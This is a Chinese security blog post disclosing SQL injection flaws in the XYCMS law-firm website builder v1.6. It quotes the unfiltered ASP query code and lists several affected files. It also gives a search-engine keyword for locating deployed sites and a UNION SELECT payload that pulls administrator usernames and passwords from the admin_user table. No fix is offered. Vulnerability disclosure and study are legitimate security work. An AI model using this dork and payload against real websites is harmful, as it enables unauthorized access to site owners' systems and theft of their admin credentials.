阿峰博客阿峰'S blog

One-Lin3r：懒人的福音，渗透测试单行化工具

年度盘点 | 安全测试者偏爱的安全测试工具

Python工具分析风险数据

国产“一句话”管理工具：开山斧

内网渗透之域渗透02-域中的信息收集

MITM6：用IPv6攻陷IPv4网络的工具

国产开源内网信息收集工具v1.0

CryKeX：Linux内存加密密钥提取工具

刷新换一批

关注我们

QRcode

QRcode

安全意识小Tips：1.在处理快递单、各种账单和交通票据时，最好先涂抹掉个人信息部分再丢弃，或者集中起来定时统一销毁。
安全意识小Tips：2.避免连接公共网络，如果非要上网，下线时一定要注销登录，并清理痕迹。
安全意识小Tips：3.在上网评论朋友微博、日志、图片时，不要随意留下朋友的个人信息，更不要故意公布他人的个人信息。
安全意识小Tips：4.在网络上留电话号码，数字之间可以用"-"隔开，避免被搜索引擎搜到。
安全意识小Tips：5.不在微信、微博等晒地点、晒自拍照，还有父母喜欢晒孩子照片等。一方面暴露了个人隐私，另一方面可能招致犯罪。
安全意识小Tips：6.自己的重要资料或数据尽量不要同步公有云上，如百度云，iCloud等，重要资料应尽量存放至本地磁盘或私有云中。

主页 » 信息安全 » 正文

XYCMS律师事务所建站系统注入漏洞

feng 2013-04-07 4,110 ℃ 0条点评

作者:Liuker
前言：刚才蛋疼无聊下载了审计下,就稍微的看了下，漏洞太多。ps：跟有个投稿的板块文章有点类似

淫荡分割线
--------------------------------------------------------

审计版本：XYCMS律师事务所建站系统 v1.6(其他版本自测)
源码地址:http://down.chinaz.com/soft/29233.htm

漏洞文件:shownews.asp
漏洞代码：7-13行

<%
id=request.QueryString("id")
set snews=server.createobject("adodb.recordset")
exec="select * from [news] where id="&id
snews.open exec,conn,1,1
%>

什么过滤都没有直造成注入

注入点:http://127.0.0.1:99/shownews.asp?id=xx

其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找

关键字：律师 powered by xycms
exp: union select 1,admin,password,4,5,7 from admin_user

本文标签：XYCMS漏洞

版权信息

永久链接：http://www.afeng.org/733.html
转载请注明转自 » 阿峰博客阿峰'S blog » XYCMS律师事务所建站系统注入漏洞

已有0条评论，欢迎点评！

国际惯例, 沙发拿下 . . .